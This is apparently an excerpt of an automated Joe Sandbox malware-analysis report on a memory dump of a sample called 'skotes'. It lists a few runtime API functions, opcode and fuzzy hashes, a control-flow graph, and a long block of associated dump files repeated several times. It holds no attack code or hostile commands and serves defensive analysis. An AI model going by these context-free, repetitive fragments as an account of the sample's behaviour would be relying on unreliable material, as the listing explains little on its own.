                                                                                                                • Instruction Fuzzy Hash: 83217931788200EBFB18BB68EC8D76CB762EBD5310F20421EE408D76D1DB3D69808312

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 351 7bd82f-7bd83a 352 7bd848-7bd84e 351->352 353 7bd83c-7bd846 351->353 355 7bd850-7bd851 352->355 356 7bd867-7bd878 RtlAllocateHeap 352->356 353->352 354 7bd87c-7bd887 call 7b75f6 353->354 360 7bd889-7bd88b 354->360 355->356 357 7bd87a 356->357 358 7bd853-7bd85a call 7b9dc0 356->358 357->360 358->354 364 7bd85c-7bd865 call 7b8e36 358->364 364->354 364->356
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,007BEE3F,?,00000004,00000000,?,?), ref: 007BD871
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: eb1ad95529a0eaecbc4e43656673cc1dcd73c29542d09df88981ef728d061fe0
                                                                                                                • Instruction ID: 6c8a2c4b5e7bd3ca1a6b207cadca37090325e5e375dfa8dcd093f8c4582437b1
                                                                                                                • Opcode Fuzzy Hash: eb1ad95529a0eaecbc4e43656673cc1dcd73c29542d09df88981ef728d061fe0
                                                                                                                • Instruction Fuzzy Hash: 11F02732601224A6EB312A769C09BDB3759DF857B2B188021FD08EB181FB3CEC0086E0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID: v{
                                                                                                                • API String ID: 3213747228-1518592600
                                                                                                                • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                • Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
                                                                                                                • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                • Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                • String ID:
                                                                                                                • API String ID: 32384418-0
                                                                                                                • Opcode ID: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
                                                                                                                • Instruction ID: ff67522a08937435a8a55695b149d02fc572c86e0c9c8ba664eee9b9bf842f70
                                                                                                                • Opcode Fuzzy Hash: 5c3d65db8751ba17445fcb1787d165ded7d679a84cf395d7f5a8d2003cfae295
                                                                                                                • Instruction Fuzzy Hash: 4AA104B0A41609DFDF11EF68D948B5AB7B8FF14B20F048129E815D7241EB39EA05CBD1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                • String ID:
                                                                                                                • API String ID: 531285432-0
                                                                                                                • Opcode ID: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
                                                                                                                • Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
                                                                                                                • Opcode Fuzzy Hash: 1d1671a99f061aa4e79fa56e415a2d43dfbd4e8e63dab465840c66a8ba2240e3
                                                                                                                • Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                • String ID: 8"~$`'~
                                                                                                                • API String ID: 3903695350-10081231
                                                                                                                • Opcode ID: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
                                                                                                                • Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
                                                                                                                • Opcode Fuzzy Hash: ca93e78b4ff8da7b16310ce28ffad3d6c9d157592c633bfaf2fa6875f1990475
                                                                                                                • Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:5.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:15.3%
                                                                                                                Total number of Nodes:543
                                                                                                                Total number of Limit Nodes:57
